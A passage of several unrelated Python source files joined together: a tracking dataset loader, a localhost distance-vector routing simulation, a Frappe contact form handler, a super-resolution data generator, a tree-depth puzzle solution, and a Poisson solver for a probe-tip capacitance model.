gt_str_list = decode_str(self.root, bb_anno_file).split('\n')[:-1] # the last line is empty
gt_list = [list(map(float, line.split(','))) for line in gt_str_list]
gt_arr = np.array(gt_list).astype(np.float32)
return torch.tensor(gt_arr)
def _read_target_visible(self, seq_path):
# Read full occlusion and out_of_view
occlusion_file = os.path.join(seq_path, "full_occlusion.txt")
out_of_view_file = os.path.join(seq_path, "out_of_view.txt")
occ_list = list(map(int, decode_str(self.root, occlusion_file).split(',')))
occlusion = torch.ByteTensor(occ_list)
out_view_list = list(map(int, decode_str(self.root, out_of_view_file).split(',')))
out_of_view = torch.ByteTensor(out_view_list)
target_visible = ~occlusion & ~out_of_view
return target_visible
def _get_sequence_path(self, seq_id):
seq_name = self.sequence_list[seq_id]
class_name = seq_name.split('-')[0]
vid_id = seq_name.split('-')[1]
return os.path.join(class_name, class_name + '-' + vid_id)
def get_sequence_info(self, seq_id):
seq_path = self._get_sequence_path(seq_id)
bbox = self._read_bb_anno(seq_path)
valid = (bbox[:, 2] > 0) & (bbox[:, 3] > 0)
visible = self._read_target_visible(seq_path) & valid.byte()
return {'bbox': bbox, 'valid': valid, 'visible': visible}
def _get_frame_path(self, seq_path, frame_id):
return os.path.join(seq_path, 'img', '{:08}.jpg'.format(frame_id+1)) # frames start from 1
def _get_frame(self, seq_path, frame_id):
return decode_img(self.root, self._get_frame_path(seq_path, frame_id))
def _get_class(self, seq_path):
raw_class = seq_path.split('/')[-2]
return raw_class
def get_class_name(self, seq_id):
seq_path = self._get_sequence_path(seq_id)
obj_class = self._get_class(seq_path)
return obj_class
def get_frames(self, seq_id, frame_ids, anno=None):
seq_path = self._get_sequence_path(seq_id)
obj_class = self._get_class(seq_path)
frame_list = [self._get_frame(seq_path, f_id) for f_id in frame_ids]
if anno is None:
anno = self.get_sequence_info(seq_id)
anno_frames = {}
for key, value in anno.items():
anno_frames[key] = [value[f_id, ...].clone() for f_id in frame_ids]
object_meta = OrderedDict({'object_class_name': obj_class,
'motion_class': None,
'major_class': None,
'root_class': None,
'motion_adverb': None})
return frame_list, anno_frames, object_meta
|
import socket
import threading
import time
import sys
# Define constant parameters
ALL_CONN = [8080,8181,8282,8383]
SERVER_PORT = 8181
IP_ADDR = "127.0.20.1"
ADDR = (IP_ADDR,SERVER_PORT)
CLIENT_ADDR = list(IP_ADDR)
CLIENT_ADDR[-1] = str(int(CLIENT_ADDR[-1]) + 1)
CLIENT_ADDR = "".join(CLIENT_ADDR)
CONFIG_PATH = "config.txt"
NODE_NUM = 2
PING_MSG = "abcdef"
PACKET_SIZE = 1024
FORMAT = "utf-8"
FACTOR = 10e3
UPPER_BOUND = 10e7
# define global variables
server = socket.socket()
client_sockets = []
client = [socket.socket()]*4
client_addrs = []
# Initialize global router table
rt = [['nil',-1,'nil']] * 4
rt[NODE_NUM-1] = [str('R'+str(NODE_NUM)),0,str('R'+str(NODE_NUM))]
latencies = [0.0] * 4
# getTopology() - gets the connection details of the nodes in the network
def getTopology():
# Open file
file = open(CONFIG_PATH,"r")
connections = []
# read the topology details line by line
line = file.readline()
while line:
# Get list of words in the line
words = line.strip().split(" ")
# Get ip and port details
ip_1,port_1 = words[0].split(":")
ip_2,port_2 = words[1].split(":")
# Update connection details
if(ip_1 == IP_ADDR):
connections.append([ip_2,int(port_2)])
elif(ip_2 == IP_ADDR):
connections.append([ip_1,int(port_1)])
line = file.readline()
return connections
# Define function to setup server
def setupServer(connections):
global server
global client_sockets
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind(ADDR)
server.listen()
print(f"[LISTENING Server is listening on {IP_ADDR}]")
time.sleep(5)
for i in range(0,len(connections)):
client_conn,cli_addr = server.accept()
client_sockets.append([cli_addr,client_conn])
print(f"[NEW CONNECTION] {cli_addr} connected.")
# Define the function to create client that connects with all nodes specified in the topology
def createClient(connections):
global client
global CLIENT_ADDR
i = 0
for conn in connections:
addr = (conn[0],int(conn[1]))
client[i] = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
client[i].bind((CLIENT_ADDR,SERVER_PORT))
client[i].connect(addr)
CLIENT_ADDR = list(CLIENT_ADDR)
CLIENT_ADDR[-1] = str(int(CLIENT_ADDR[-1]) + 1)
CLIENT_ADDR = "".join(CLIENT_ADDR)
i = i + 1
# Let us define th listenToPing() function that responds to incoming pings
def listenToPing(conn):
msg = conn.recv(1024)
conn.send(msg)
# Runner thread to exchange latency contribution of current node to all requesting nodes
def exchangeLatency(conn, lat_str):
msg = conn.recv(1024).decode(FORMAT)
if(msg == "EXCHG"):
conn.send(lat_str.encode(FORMAT))
# function to update the RT based on latency costs from neighbors using Bellman Ford
def updateRT(index,lat_str):
latency = lat_str.strip().split(",")
latency = list(map(float,latency))
cost_x = rt[index][1]
for i in range(0,4):
updated_cost = cost_x + latency[i]
if(rt[i][1] > updated_cost):
rt[i][1] = updated_cost
rt[i][2] = str("R"+str(index+1))
# Given the current hop and destination find the next hop by calling the appropriate server
def getNextHop(curr_hop,dest,conn):
# First send request to node
request_msg = str(dest)
# time.sleep(2)
conn.send(request_msg.encode(FORMAT))
# Get next hop from node
next_hop = conn.recv(1024).decode(FORMAT)
next_hop = next_hop.strip().split(",")
return next_hop
# runner function to handle next hop requests
def nextHop(conn):
# global client_addrs
# global client_sockets
while(1):
req_msg = conn.recv(1024).decode(FORMAT)
dest = int(req_msg)
# Get next hop
next_hop = rt[dest][2]
# print("sada",next_hop)
if(int(next_hop[1]) != dest+1):
next_conn = client_sockets[client_addrs.index(int(ALL_CONN[int(rt[dest][2][-1]) - 1]))][1]
next_conn.send(str(dest).encode(FORMAT))
next_hop = next_hop + "," + next_conn.recv(1024).decode(FORMAT)
conn.send(next_hop.encode(FORMAT))
def main():
# First let us obtain the topology details from the config.txt file
connections = []
connections = getTopology()
num_connections = len(connections)
print("[NETWORK TOPOLOGY] Number of connections =",len(connections))
for conn in connections:
print("[NETWORK TOPOLOGY] ",IP_ADDR," --> ",conn[0],":",conn[1],sep ="")
# Now that we have the server client details let us create server and client in threads
thread = [0] * 2
thread[0] = threading.Thread(target = setupServer,args = [connections])
thread[0].start()
time.sleep(5)
thread[1] = threading.Thread(target = createClient,args = [connections])
thread[1].start()
# Join both the threads
thread[0].join()
thread[1].join()
# Sleep for 2 seconds to ensure the topology is constructed for all nodes
time.sleep(2)
# Find the latencies of the connections - RTT for a std message
curr_connected = [int(conn[1]) for conn in connections]
# First let us fill in max value for connections not connected to current node
for indx in range(0,len(ALL_CONN)):
if(int(ALL_CONN[indx]) not in curr_connected):
latencies[indx] = UPPER_BOUND
latencies[NODE_NUM - 1] = 0
# Now let us find the RTT of nodes connected to current node
# Setup all the clients in separate threads to respond to any incoming pings
ping_threads = [0] * num_connections
for i in range(0,num_connections):
ping_threads[i] = threading.Thread(target = listenToPing, args = [client[i]])
ping_threads[i].start()
print("[NETWORK TOPOLOGY] Pinging all connected nodes ...")
# Make the server ping all connections
for item in client_sockets:
conn = item[1]
start = time.time()
conn.send(PING_MSG.encode(FORMAT))
ret_msg = conn.recv(1024)
end = time.time()
latencies[ALL_CONN.index(int(item[0][1]))] = (end - start) * FACTOR
# Join all ping threads
for i in range(0,num_connections):
ping_threads[i].join()
print("[NETWORK TOPOLOGY] Latencies:",latencies)
# Init the routing table and print it
print("\n[DVR] Initial Routing Table is:")
print("%-20s %-25s %-20s" %("Destination","Cost (Latency)","Next Hop"))
for indx in range(0,4):
rt[indx] = [str('R'+str(indx+1)),latencies[indx],str('R'+str(indx+1))]
print("%-20s %-25s %-20s" %(rt[indx][0],rt[indx][1],rt[indx][2]))
# STEP-5: Update routing table - For 3 iterations
for loop in range(0,3):
print("\n******************* ITERATION -",loop+1,": ************************")
# First let us setup the string to be passed from R1 (comma separated latencies)
latency_str = ",".join([str(lat[1]) for lat in rt])
# Iterate over all nodes and request if connected
print("\n[DVR] Exchanging Routing Information ...")
for indx in range(0,4):
if indx == NODE_NUM-1:
continue
elif ALL_CONN[indx] not in curr_connected:
print("[DVR]",rt[NODE_NUM-1][0],"is not connected to",rt[indx][0])
# Setup threads to exchange the latency contributions of current code to requesting clients
latency_threads = [0] * num_connections
for i in range(0,num_connections):
latency_threads[i] = threading.Thread(target = exchangeLatency, args = [client[i],latency_str])
latency_threads[i].start()
request_msg = "EXCHG"
received_lat_str = ["0,0,0,0"]*4
i = 0
for item in client_sockets:
conn = item[1]
conn.send(request_msg.encode(FORMAT))
received_lat_str[ALL_CONN.index(int(item[0][1]))] = conn.recv(1024).decode(FORMAT)
for i in range(0,num_connections):
latency_threads[i].join()
print("[DVR] Received routing information is:")
print(received_lat_str)
# Update the router table based on the received latencies - Bellman Ford will used here
for indx in range(0,4):
if(received_lat_str[indx] != "0,0,0,0"):
updateRT(indx,received_lat_str[indx])
print("\n[DVR] Routing Table after iteration -",loop+1,"is: ")
print("%-20s %-25s %-20s" %("Destination","Cost (Latency)","Next Hop"))
for indx in range(0,4):
print("%-20s %-25s %-20s" %(rt[indx][0],rt[indx][1],rt[indx][2]))
# Print the route for each current src - destination pair
global client_addrs
client_addrs = [int(item[0][1]) for item in client_sockets]
# First setup the server thatll respond to requests from from any connection if any (regarding next hops)
hop_threads = [0] * num_connections
for i in range(0,num_connections):
hop_threads[i] = threading.Thread(target = nextHop, args = [client[i]])
hop_threads[i].start()
# Iterate over each destination and find the route by requesting appropriate clients for the next hop
hop_list = [rt[NODE_NUM-1][0]]
print("\n[DVR] Printing routing information")
for i in range(0,4):
if i != NODE_NUM - 1:
dest = rt[i][0]
next_hop = rt[i][2]
hop_list.append(next_hop)
while(dest not in hop_list):
conn = client_sockets[client_addrs.index(ALL_CONN[int(rt[i][2][-1]) - 1])][1]
next_hop = getNextHop(int(next_hop[-1])-1,i,conn)
hop_list.extend(next_hop)
print(*hop_list, sep=' -> ')
hop_list = [rt[NODE_NUM-1][0]]
# Sleep 5 seconds and then close all hop_threads
time.sleep(5)
if __name__ == '__main__':
main()
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
import frappe
from frappe.utils import now
from frappe import _
sitemap = 1
def get_context(context):
doc = frappe.get_doc("Contact Us Settings", "Contact Us Settings")
if doc.query_options:
query_options = [opt.strip() for opt in doc.query_options.replace(",", "\n").split("\n") if opt]
else:
query_options = ["Sales", "Support", "General"]
out = {
"query_options": query_options,
"parents": [
{ "name": _("Home"), "route": "/" }
]
}
out.update(doc.as_dict())
return out
max_communications_per_hour = 1000
@frappe.whitelist(allow_guest=True)
def send_message(subject="Website Query", message="", sender=""):
if not message:
frappe.response["message"] = 'Please write something'
return
if not sender:
frappe.response["message"] = 'Email Address Required'
return
# guest method, cap max writes per hour
if frappe.db.sql("""select count(*) from `tabCommunication`
where `sent_or_received`="Received"
and TIMEDIFF(%s, modified) < '01:00:00'""", now())[0][0] > max_communications_per_hour:
frappe.response["message"] = "Sorry: we believe we have received an unreasonably high number of requests of this kind. Please try later"
return
# send email
forward_to_email = frappe.db.get_value("Contact Us Settings", None, "forward_to_email")
if forward_to_email:
frappe.sendmail(recipients=forward_to_email, sender=sender, content=message, subject=subject)
# add to to-do ?
frappe.get_doc(dict(
doctype = 'Communication',
sender=sender,
subject= _('New Message from Website Contact Page'),
sent_or_received='Received',
content=message,
status='Open',
)).insert(ignore_permissions=True)
return "okay"
|
"""
"""
import os
import numpy as np
import skimage.io
import skimage.filters
import skimage.transform
import skimage.util
import tensorflow as tf
def hd_image_to_sd_image(hd_image, scaling_factor):
"""
down scale image then scale back to build sd version. assume the type of
the image is already float.
"""
hd_h, hd_w, c = hd_image.shape
# NOTE: downscaled size
sd_h = int(hd_h / scaling_factor)
sd_w = int(hd_w / scaling_factor)
# NOTE: in scikit-image 0.14, anti_aliasing fails if mode is 'edge'
# https://github.com/scikit-image/scikit-image/issues/3299
# DIY, sigma function is from the implementation of scikit-image
sigma = np.maximum(0.0, 0.5 * (scaling_factor - 1.0))
bl_image = skimage.filters.gaussian(hd_image, sigma, mode='nearest')
# NOTE: downscale then upscale
sd_image = skimage.transform.resize(
bl_image, [sd_h, sd_w], mode='edge', anti_aliasing=False)
sd_image = skimage.transform.resize(
sd_image, [hd_h, hd_w], mode='edge', anti_aliasing=False)
return sd_image
def image_batches(source_dir_path, scaling_factors, image_size, batch_size):
"""
source_dir_path:
read images inside this directory
scaling_factors:
different scale factors for training
image_size:
randomly crop all images to image_size (width) x image_size (width)
batch_size:
number of images per batch
"""
def image_paths():
"""
a generator that yields image path within source_dir_path in random
order
"""
paths = tf.gfile.ListDirectory(source_dir_path)
while True:
np.random.shuffle(paths)
for path in paths:
yield os.path.join(source_dir_path, path)
# NOTE: arXiv:1511.04587v2, accurate image super-resolution using very deep
# convolutional networks
# figure 5
if scaling_factors is None or len(scaling_factors) <= 0:
scaling_factors = [2.0, 3.0, 4.0]
# NOTE: sanity check
if any([s <= 1 for s in scaling_factors]):
raise Exception('invalide scaling factors')
# NOTE: infinit image path generator
image_path_generator = image_paths()
# NOTE: container to keep images in a batch
sd_images = []
hd_images = []
while True:
hd_image_path = next(image_path_generator)
# NOTE: read image, images may come from google cloud storage
with tf.gfile.GFile(hd_image_path, 'rb') as hd_image_file:
hd_image = skimage.io.imread(hd_image_file)
# NOTE: drop small images
h, w, c = hd_image.shape
if h < image_size or w < image_size or c != 3:
continue
# NOTE: data augmentation, random crop to image_size x image_size x 3
x = np.random.randint(w - image_size)
y = np.random.randint(h - image_size)
hd_image = hd_image[y:y+image_size, x:x+image_size, :]
# NOTE: data augmentation, random horizontal flip
if 1 == np.random.choice([0, 1]):
hd_image = hd_image[:, ::-1, :]
# NOTE: cast uint8 to float32
hd_image = skimage.util.img_as_float32(hd_image)
# NOTE: build sd version
scaling_factor = np.random.choice(scaling_factors)
sd_image = hd_image_to_sd_image(hd_image, scaling_factor)
# NOTE: from [0.0, 1.0] to [-1.0, +1.0]
sd_image = sd_image * 2.0 - 1.0
hd_image = hd_image * 2.0 - 1.0
sd_images.append(sd_image)
hd_images.append(hd_image)
# NOTE: yield a collected batch
if len(sd_images) == batch_size:
sd_images = np.stack(sd_images, axis=0)
hd_images = np.stack(hd_images, axis=0)
yield sd_images, hd_images
sd_images = []
hd_images = []
|
"""
# Definition for a Node.
class Node:
def __init__(self, val, children):
self.val = val
self.children = children
"""
class Solution:
def maxDepth(self, root: 'Node') -> int:
if not root:
return 0
stack = [(root, 1)]
maxVal = -float('inf')
while stack:
node, currDepth = stack.pop()
children = node.children
if not any(children):
maxVal = max(maxVal, currDepth)
for c in children:
if c:
stack.append([c, currDepth+1])
return maxVal
|
import numpy as np
from numpy.lib.arraysetops import union1d
from scipy import linalg
from scipy import sparse
from scipy.sparse import linalg as la
from tqdm import tqdm
import time
import copy
import capsol.newanalyzecapsol as nac
from datetime import datetime as dt
from dataclasses import dataclass
# R, Z = np.meshgrid(rs, zs) # z_size by r_size.
#
def sphere(r, z, Rtip):
"""Check if grid points are in the tip sphere.
Parameters:
r: """
return (r**2 + (z - Rtip)**2) <= Rtip**2
def cone(r, z, Rtip, theta, hcone):
"""Check if grid points are in the tip cone."""
return np.where(np.logical_and(z >= Rtip, z<hcone), r <= (Rtip + (z - Rtip)*np.sin(theta)), False)
def body(r, z, hcone, dcant, rcant):
return np.where((z>=hcone) * (z<(hcone+dcant)), r <= rcant, False)
def sample(z, n_sample):
n, m = z.shape
return np.s_[1:1+n_sample, :]
def epsilon_z(z, d, eps_r):
"""Returns epsilon_r(z) defined on the staggered grid.
Ex: For d = 1.0 nm, a grid spaced every 0.5 nm, and eps_r = 3.0, we have
z_ind z epsz_ind eps_z
0 -2.0 -----------
0 3.0
1 -1.5 -- sample --
1 3.0
2 -1.0 ------------
2 1.0
3 -0.5 -- vaccuum --
3 1.0
4 0 -------------
tip
Note that the array returned is always 1 shorter than the input array of z values.
"""
tol = 1e-8 # Add a small margin for rounding error
return np.where(z[1:] <= (-d+tol), eps_r, 1.0)
def geometric_sum(r, a1, n):
return sum(np.array([a1 * r ** i for i in range(1, n + 1)]))
def find_ratio(total, h0, terms):
r = 1.00001
s = 0
while s < total:
s = geometric_sum(r, h0, terms)
r += 0.00001
return r
def guni_grid(nuni, n, h0, grid_max):
"""Generates geometric grid which can be used for the radial and z directions.
nuni: number of uniform grid points
n: number of gird points
h0: initial grid spacing
grid_max: rho_max or z_max, maximum grid size"""
r = np.zeros(n+1)
dr = np.zeros(n) # Could also use n+1
dr[:nuni] = h0
r[1:nuni+1] = np.cumsum(dr[:nuni])
r_left = grid_max-(nuni*h0)
n_left=n-nuni
ratio= find_ratio(r_left, h0, n_left)
for i in range(n_left):
dr[nuni+i]= h0*ratio**(i+1)
r[1:] = np.cumsum(dr[:])
return r, ratio
def gapsam_gridsize(h0, hsam, z):
n_sample=int(np.round(hsam/h0))
n_gap=int(np.round(z/h0))
gapsam=n_sample + n_gap # No need for an extra point - use the bottom of the sample as the boundary
return gapsam
def generate_gapsam_grid(h0, hsam, z):
N=gapsam_gridsize(h0, hsam, z)
z_minus=np.arange(N)*h0 + -(z+hsam)
return z_minus
# def setup_probe(R, Z, Rtip, theta, hcone, dcant):
# # Tip points if code, sphere, body
# spm_tip = ( cs.cone(R, Z, Rtip, theta, hcone) + cs.sphere(R, Z, Rtip)
# + cs.body(R, Z, hcone, dcant, rcant) )
# # Need to make sure there is one data point in the cantilever...
# z_grid = Z[:, 0] # A single Z column
# b = np.ones_like(R) # set the boundaries
# u = np.zeros_like(R)
# u[spm_tip] = 1.0
# # Ra = Rtip * (1 - np.sin(theta))
# # Rc = Rtip * np.cos(theta)
# probe_top = np.zeros_like(z_grid, dtype=int)
# # -1 means that the probe is not directly above this data point at all
# probe_bot = np.ones_like(r, dtype=int)*-1
# for i, row in enumerate(spm_tip.T):
# if any(row):
# probe_bot[i] = np.argmax(row) # First z value where the probe is found
# # Specify boundaries
# b[0, :] = 0.0
# b[-1, :] = 0.0
# b[:, -1] = 0.0
# itop = np.argmax(z_grid > (hcone+dcant))
# probe_top[:] = itop
# return b, u, probe_top, probe_bot
def boundary_radial(Nr, Nz):
"""Returns points that are on the cylindrical coordinate boundary. As a 2D array u_ij,
where i is the z-coordinate index and j is the radius index, this returns a boundary array where points
where i = 0 or Nz - 1 or j = Nr - 1 return True.
"""
bc = np.zeros(Nr*Nz,dtype=bool)
for i in range(Nz):
for j in range(Nr):
if i == 0 or i == (Nz-1) or j == (Nr-1):
ind = i * Nr + j # This point
bc[ind] = True
return bc
def poisson_variable_spacing_radial(x, y):
Nx = len(x)
Ny = len(y)
hx = np.diff(x)
hy = np.diff(y)
A = sparse.lil_matrix((Nx*Ny, Nx*Ny))
for i in range(Ny):
for j in range(Nx): # Radial
ind = i * Nx + j # This point
ixp = ind + 1 # +x
ixn = ind - 1 # -x
iyp = (i+1)*Nx + j # +y
iyn = (i-1)*Nx + j # -y
Dx_plus = hx[j] if j < (Nx-1) else 0.0
Dx_minus = hx[j-1] if j > 0 else hx[j]
x0 = x[j]
Dy_plus = hy[i] if i < (Ny-1) else 0.0
Dy_minus = hy[i-1] if i > 0 else 0.0
prefactor_x = 4/((Dx_plus+Dx_minus)*(Dx_plus**2 + Dx_minus**2))
prefactor_y = 4/((Dy_plus+Dy_minus)*(Dy_plus**2 + Dy_minus**2))
A[ind, ind] = (Dx_plus+Dx_minus) * prefactor_x + (Dy_plus+Dy_minus) * prefactor_y
if j == 0:
A[ind, ixp] = -2 * Dx_minus * prefactor_x # That's it, no radial derivative here...
elif j < (Nx - 1):
A[ind, ixp] = -1 * Dx_minus * prefactor_x + -1 / (x0 * (Dx_plus+Dx_minus))
if j > 0:
A[ind, ixn] = -1 * Dx_plus * prefactor_x + 1 / (x0 * (Dx_plus+Dx_minus))
if j == (Nx - 1):
A[ind, ind] += -1 / (x0 * (Dx_plus+Dx_minus)) # 1st order difference uses the grid point here...
if i > 0:
A[ind, iyn] = -1 * Dy_plus * prefactor_y
if i < (Ny-1):
A[ind, iyp] = -1 * Dy_minus * prefactor_y
return sparse.csr_matrix(A) # Convert to better format for usage
def poisson_variable_spacing_radial_samp(r, y, eps_z):
Nr = len(r)
Ny = len(y)
hr = np.diff(r)
hy = np.diff(y)
# Define eps_z on the same grid as the voltage (eps_z uses the staggered grid)
eps_z_grid = np.r_[0.5+eps_z[0]*0.5, 0.5*(eps_z[1:]+eps_z[:-1]), 0.5+eps_z[-1]*0.5]
A = sparse.lil_matrix((Nr*Ny, Nr*Ny))
for i in range(Ny):
for j in range(Nr): # Radial
ind = i * Nr + j # This point
irp = ind + 1 # +r
irn = ind - 1 # -r
iyp = (i+1)*Nr + j # +y
iyn = (i-1)*Nr + j # -y
Dr_plus = hr[j] if j < (Nr-1) else 0.0
Dr_minus = hr[j-1] if j > 0 else hr[j]
r0 = r[j]
eps_r = eps_z_grid[i] # Grab our estimate of eps_r at the grid boundary...
eps_p = eps_z[i] if i < (Ny-1) else 1.0
eps_m = eps_z[i-1] if i > 0 else 1.0
Dy_plus = hy[i] if i < (Ny-1) else 0.0
Dy_minus = hy[i-1] if i > 0 else 0.0
prefactor_r = 4/((Dr_plus+Dr_minus)*(Dr_plus**2 + Dr_minus**2))
# This is different I think...
# At the boundary, we need a different approximation...
if (i > 0) and i < (Ny-1):
prefactor_y = 2/((Dy_plus+Dy_minus) * Dy_minus * Dy_plus)
else:
prefactor_y = 4/((Dy_plus+Dy_minus)*(Dy_plus**2 + Dy_minus**2))
# Smallest index first...
if i > 0:
A[ind, iyn] = -1 * Dy_plus * eps_m * prefactor_y
# Second index...
if j > 0:
A[ind, irn] = -eps_r * Dr_plus * prefactor_r + eps_r / (r0 * (Dr_plus+Dr_minus))
# On the diagonal next...
A[ind, ind] = (Dr_plus+Dr_minus) * prefactor_r * eps_r + (eps_m*Dy_plus+eps_p*Dy_minus) * prefactor_y
if j == (Nr - 1):
A[ind, ind] += -eps_r / (r0 * (Dr_plus+Dr_minus)) # 1st order difference uses the grid point here...
if j == 0:
A[ind, irp] = -2 * Dr_minus * prefactor_r * eps_r # That's it, no radial derivative here...
elif j < (Nr - 1):
A[ind, irp] = -1 * Dr_minus * prefactor_r * eps_r - eps_r / (r0 * (Dr_plus+Dr_minus))
if i < (Ny-1):
A[ind, iyp] = -1 * Dy_minus * eps_p * prefactor_y
return sparse.csr_matrix(A) # Convert to better format for usage
def poisson_var_rad_samp_fast(r, y, eps_z):
Nr = len(r)
Ny = len(y)
hr = np.diff(r)
hy = np.diff(y)
# Define eps_z on the same grid as the voltage (eps_z uses the staggered grid)
eps_z_grid = np.r_[0.5+eps_z[0]*0.5, 0.5*(eps_z[1:]+eps_z[:-1]), 0.5+eps_z[-1]*0.5]
A = arrayBuilderInd()
for i in range(Ny):
for j in range(Nr): # Radial
ind = i * Nr + j # This point
irp = ind + 1 # +r
irn = ind - 1 # -r
iyp = (i+1)*Nr + j # +y
iyn = (i-1)*Nr + j # -y
Dr_plus = hr[j] if j < (Nr-1) else 0.0
Dr_minus = hr[j-1] if j > 0 else hr[j]
r0 = r[j]
eps_r = eps_z_grid[i] # Grab our estimate of eps_r at the grid boundary...
eps_p = eps_z[i] if i < (Ny-1) else 1.0
eps_m = eps_z[i-1] if i > 0 else 1.0
Dy_plus = hy[i] if i < (Ny-1) else 0.0
Dy_minus = hy[i-1] if i > 0 else 0.0
prefactor_r = 4/((Dr_plus+Dr_minus)*(Dr_plus**2 + Dr_minus**2))
# This is different I think...
# At the boundary, we need a different approximation...
if (i > 0) and i < (Ny-1):
prefactor_y = 2/((Dy_plus+Dy_minus) * Dy_minus * Dy_plus)
else:
prefactor_y = 4/((Dy_plus+Dy_minus)*(Dy_plus**2 + Dy_minus**2))
# Smallest index first...
if i > 0:
A[ind, iyn] = -1 * Dy_plus * eps_m * prefactor_y
# Second index...
if j > 0:
A[ind, irn] = -eps_r * Dr_plus * prefactor_r + eps_r / (r0 * (Dr_plus+Dr_minus))
# On the diagonal next...
A[ind, ind] = (Dr_plus+Dr_minus) * prefactor_r * eps_r + (eps_m*Dy_plus+eps_p*Dy_minus) * prefactor_y
if j == (Nr - 1):
A[ind, ind] = -eps_r / (r0 * (Dr_plus+Dr_minus)) # 1st order difference uses the grid point here...
if j == 0:
A[ind, irp] = -2 * Dr_minus * prefactor_r * eps_r # That's it, no radial derivative here...
elif j < (Nr - 1):
A[ind, irp] = -1 * Dr_minus * prefactor_r * eps_r - eps_r / (r0 * (Dr_plus+Dr_minus))
if i < (Ny-1):
A[ind, iyp] = -1 * Dy_minus * eps_p * prefactor_y
return sparse.csr_matrix(sparse.coo_matrix((A.data, (A.rows, A.cols)), shape=(Nr*Ny, Nr*Ny))) # Convert to better format for usage
def _poisson_var_rad_samp_fast(r, y, eps_z):
Nr = len(r)
Ny = len(y)
hr = np.diff(r)
hy = np.diff(y)
# Define eps_z on the same grid as the voltage (eps_z uses the staggered grid)
eps_z_grid = np.r_[0.5+eps_z[0]*0.5, 0.5*(eps_z[1:]+eps_z[:-1]), 0.5+eps_z[-1]*0.5]
A = arrayBuilderInd()
for i in range(Ny):
for j in range(Nr): # Radial
ind = i * Nr + j # This point
irp = ind + 1 # +r
irn = ind - 1 # -r
iyp = (i+1)*Nr + j # +y
iyn = (i-1)*Nr + j # -y
Dr_plus = hr[j] if j < (Nr-1) else 0.0
Dr_minus = hr[j-1] if j > 0 else hr[j]
r0 = r[j]
eps_r = eps_z_grid[i] # Grab our estimate of eps_r at the grid boundary...
eps_p = eps_z[i] if i < (Ny-1) else 1.0
eps_m = eps_z[i-1] if i > 0 else 1.0
Dy_plus = hy[i] if i < (Ny-1) else 0.0
Dy_minus = hy[i-1] if i > 0 else 0.0
prefactor_r = 4/((Dr_plus+Dr_minus)*(Dr_plus**2 + Dr_minus**2))
# This is different I think...
# At the boundary, we need a different approximation...
if (i > 0) and i < (Ny-1):
prefactor_y = 2/((Dy_plus+Dy_minus) * Dy_minus * Dy_plus)
else:
prefactor_y = 4/((Dy_plus+Dy_minus)*(Dy_plus**2 + Dy_minus**2))
# Smallest index first...
if i > 0:
A[ind, iyn] = -1 * Dy_plus * eps_m * prefactor_y
# Second index...
if j > 0:
A[ind, irn] = -eps_r * Dr_plus * prefactor_r + eps_r / (r0 * (Dr_plus+Dr_minus))
# On the diagonal next...
A[ind, ind] = (Dr_plus+Dr_minus) * prefactor_r * eps_r + (eps_m*Dy_plus+eps_p*Dy_minus) * prefactor_y
if j == (Nr - 1):
A[ind, ind] = -eps_r / (r0 * (Dr_plus+Dr_minus)) # 1st order difference uses the grid point here...
if j == 0:
A[ind, irp] = -2 * Dr_minus * prefactor_r * eps_r # That's it, no radial derivative here...
elif j < (Nr - 1):
A[ind, irp] = -1 * Dr_minus * prefactor_r * eps_r - eps_r / (r0 * (Dr_plus+Dr_minus))
if i < (Ny-1):
A[ind, iyp] = -1 * Dy_minus * eps_p * prefactor_y
return A
def _poisson_finish(r, y, eps_z, A_old, params):
N_samp = int(np.round(params.d/params.h0))
i_max = (params.Nz_plus + N_samp - 1)
ind = (i_max) * params.Nr # Use this as the cutoff..
imax = np.argmax(np.array(A_old.rows) >= ind)
s = slice(imax)
A = arrayBuilderInd()
A.rows = copy.copy(A_old.rows[s])
A.cols = copy.copy(A_old.cols[s])
A.data = copy.copy(A_old.data[s])
Nr = len(r)
Ny = len(y)
hr = np.diff(r)
hy = np.diff(y)
# Define eps_z on the same grid as the voltage (eps_z uses the staggered grid)
eps_z_grid = np.r_[0.5+eps_z[0]*0.5, 0.5*(eps_z[1:]+eps_z[:-1]), 0.5+eps_z[-1]*0.5]
for i in range(i_max, Ny): # Start near the bottom of the gap region...
for j in range(Nr): # Radial
ind = i * Nr + j # This point
irp = ind + 1 # +r
irn = ind - 1 # -r
iyp = (i+1)*Nr + j # +y
iyn = (i-1)*Nr + j # -y
Dr_plus = hr[j] if j < (Nr-1) else 0.0
Dr_minus = hr[j-1] if j > 0 else hr[j]
r0 = r[j]
eps_r = eps_z_grid[i] # Grab our estimate of eps_r at the grid boundary...
eps_p = eps_z[i] if i < (Ny-1) else 1.0
eps_m = eps_z[i-1] if i > 0 else 1.0
Dy_plus = hy[i] if i < (Ny-1) else 0.0
Dy_minus = hy[i-1] if i > 0 else 0.0
prefactor_r = 4/((Dr_plus+Dr_minus)*(Dr_plus**2 + Dr_minus**2))
# This is different I think...
# At the boundary, we need a different approximation...
if (i > 0) and i < (Ny-1):
prefactor_y = 2/((Dy_plus+Dy_minus) * Dy_minus * Dy_plus)
else:
prefactor_y = 4/((Dy_plus+Dy_minus)*(Dy_plus**2 + Dy_minus**2))
# Smallest index first...
if i > 0:
A[ind, iyn] = -1 * Dy_plus * eps_m * prefactor_y
# Second index...
if j > 0:
A[ind, irn] = -eps_r * Dr_plus * prefactor_r + eps_r / (r0 * (Dr_plus+Dr_minus))
# On the diagonal next...
A[ind, ind] = (Dr_plus+Dr_minus) * prefactor_r * eps_r + (eps_m*Dy_plus+eps_p*Dy_minus) * prefactor_y
if j == (Nr - 1):
A[ind, ind] = -eps_r / (r0 * (Dr_plus+Dr_minus)) # 1st order difference uses the grid point here...
if j == 0:
A[ind, irp] = -2 * Dr_minus * prefactor_r * eps_r # That's it, no radial derivative here...
elif j < (Nr - 1):
A[ind, irp] = -1 * Dr_minus * prefactor_r * eps_r - eps_r / (r0 * (Dr_plus+Dr_minus))
if i < (Ny-1):
A[ind, iyp] = -1 * Dy_minus * eps_p * prefactor_y
return A
class arrayBuilder:
def __init__(self, estimated_size=None):
self.rows = []
self.cols = []
self.data = []
def __call__(self, row, col, val):
self.rows.append(row)
self.cols.append(col)
self.data.append(val)
class arrayBuilderInd:
def __init__(self, estimated_size=None):
self.rows = []
self.cols = []
self.data = []
def __setitem__(self, rowcol, val):
self.rows.append(rowcol[0])
self.cols.append(rowcol[1])
